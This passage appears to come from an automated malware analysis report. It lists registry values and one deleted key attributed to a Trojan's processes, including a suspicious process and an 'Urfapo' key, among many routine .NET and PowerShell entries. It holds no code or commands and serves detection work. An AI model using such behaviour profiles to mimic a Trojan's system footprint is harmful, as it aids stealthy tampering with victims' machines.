"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "AE 88 8B C1 AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "197"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "198"
"StoreChangeIDFor64BitProcesses" = "176"
"StoreChangeIDFor32BitProcesses" = "197"

The process PSCustomSetupUtil.exe:2332 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D9 CB 5C 3C 74 35 6A 54 61 9C 64 BB C5 F2 10 23"

[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"Path" = "C:\Perl\site\bin;C:\Perl\bin;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;c:\Program Files\Wireshark;%System%\WindowsPowerShell\v1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process PSCustomSetupUtil.exe:2556 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 AF 49 36 5B 22 39 C6 97 31 0F B9 8F 07 66 32"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "0C C1 C7 CB AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GPowerShell.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "210"
"StoreChangeIDFor64BitProcesses" = "188"
"StoreChangeIDFor32BitProcesses" = "209"

The process PSCustomSetupUtil.exe:2140 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B5 10 5C DF FC B8 21 75 7A 16 45 66 D8 1A 28 0C"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "88 81 26 C2 AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "201"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "202"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "180"
"StoreChangeIDFor32BitProcesses" = "201"

The process ipconfig.exe:1240 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "61 15 BF 2F B5 89 86 C3 D3 97 F1 32 28 D4 48 ED"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process yfenaromaf.exe:1664 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 B5 A4 65 FC 46 B9 A5 42 20 16 46 A4 B9 81 35"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process PSSetupNativeUtils.exe:1932 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "00 B5 CC 46 EE 3D 80 2F 7C DD A3 03 C6 08 FA 9E"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process mscorsvw.exe:4008 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 61 5F 71 73 90 CA ED 96 E6 BA BF D5 8B 56 3D"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:3128 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 0A 01 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "0"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 02 01 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 08 01 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F8 00 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "0"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 0F 67 71 89 16 30 A7 3B 8D 48 59 6B A9 72 32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 1C 01 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 EE 00 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

The process mscorsvw.exe:2592 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"DisplayName" = "Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\643db07b\27\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
"ConfigMask" = "4361"
"MVID" = "93 92 67 97 48 6D 4F 7A 9B 69 C5 87 5F F3 FC 30"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"ConfigString" = "ZAP--0000-0000"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"LastModTime" = "D0 21 40 C0 AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\43970528\4b\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"DisplayName" = "Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 30 BD F2 F8 D4 1E F0 A9 57 F4 3B B9 53 69 DD"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"SIG" = "EF D0 54 19 D0 F5 86 44 A9 62 4E 86 6A 5F 6C 6E"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "93"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]

The process mscorsvw.exe:2732 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2B BF 44 4A 6C FA 52 B2 10 EC 05 A2 E2 3F 31 5A"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:3104 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F9 B7 83 50 EF BF ED 23 59 86 2D 41 F4 1A 34 C4"

